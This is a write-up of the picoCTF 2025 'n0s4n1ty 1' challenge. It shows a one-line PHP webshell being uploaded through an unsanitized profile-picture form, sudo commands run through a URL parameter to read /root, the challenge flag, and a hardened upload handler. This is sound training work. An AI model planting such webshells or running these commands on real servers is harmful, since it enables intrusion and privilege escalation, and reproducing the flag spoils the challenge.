n0s4n1ty 1
Name: n0s4n1ty 1
Description: A developer has added profile picture upload functionality to a website. However, the implementation is flawed, and it presents an opportunity for you. Your mission, should you choose to accept it, is to navigate to the provided web page and locate the file upload area. Your ultimate goal is to find the hidden flag located in the /root directory. You can access the web application here!
Author: Prince Niyonshuti N.
Tags: Easy, Web Exploitation, picoCTF 2025, browser_webshell_solvable
Challenge from: picoCTF 2025
Hints:
1. File upload was not sanitized
2. Whenever you get a shell on a remote machine, check sudo -l
Theory
According to the description, to get the flag we have to somehow gain the ability to run commands, so that we can use sudo to get into the root directory and read the flag from there. We've got a profile picture upload, so we'll probably upload a PHP file. I don't know how much security this has, but uploading a PHP file and running commands from it through a URL parameter is a fast way to do it. If the upload isn't locked down we'll try this, and if it doesn't work we'll change some things later. The PHP code is really simple: it grabs the parameter run from the link, so like file.php?run=something, and executes that something as a shell command, it's that easy:
<?php echo system($_GET['run']); ?>
Solution
So we'll open the website and upload the file with the PHP code we just wrote:

The file nuh-sanitie.php has been uploaded Path: uploads/nuh-sanitie.php
Okay! And it actually worked. I guess because the level is called no sanity it doesn't really sanitize input, which makes it possible to upload odd files like the one we just uploaded. So now we're going to go to the file link they gave us and put whatever we want to execute with sudo in the URL. First we'll run what the second hint said, sudo -l:
?run=sudo -l

That doesn't seem to give us anything, so let's just continue with what the description says and look through the root directory:
?run=sudo ls -la /root

It's a little unreadable because the spaces and newlines are all messed up by the HTML rendering, so let's press Ctrl+U to view the page source, where the output is laid out as it should be:

Much better, now let's use cat to print the contents of the flag file:
?run=sudo cat /root/flag

And the flag is:
picoCTF{wh47_c4n_u_d0_wPHP_4043cda3}
There we go! That's the flag.
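For contrast, here is what a sanitized version of that upload handler looks like, as an added example and not the challenge's own code. It assumes the form field is named picture and a storage directory UPLOAD_DIR that the web server does not serve, so a stored file can never be requested as /uploads/name.php the way the webshell was.

```php
<?php
// Added example (not the challenge's code): a hardened profile-picture upload.
// Assumption: UPLOAD_DIR is outside the web root and never served directly;
// images are handed back to browsers by a separate read-only script.
const UPLOAD_DIR = '/var/app/uploads_private';
const MAX_BYTES  = 2 * 1024 * 1024;

// Sniffed MIME type -> extension the server assigns. The client's filename,
// extension and $_FILES['type'] are never trusted.
const ALLOWED = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

function store_profile_picture(array $file): string {
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Content type from magic bytes, not from the client-controlled header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('only PNG, JPEG and GIF images are accepted');
    }
    // Second opinion: the image decoder must parse it, which rejects files
    // that merely begin with an image signature.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-chosen random name with a single, non-executable extension, so
    // names like shell.php or shell.php.png never reach disk.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Usage: $name = store_profile_picture($_FILES['picture']);
```

Whether or not the upload is fixed, the second flaw this walkthrough relies on, a web-server account allowed to run arbitrary commands through sudo, is corrected separately by removing that sudoers entry.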
I rated this level as "good"! :3
https://play.picoctf.org/practice/challenge/482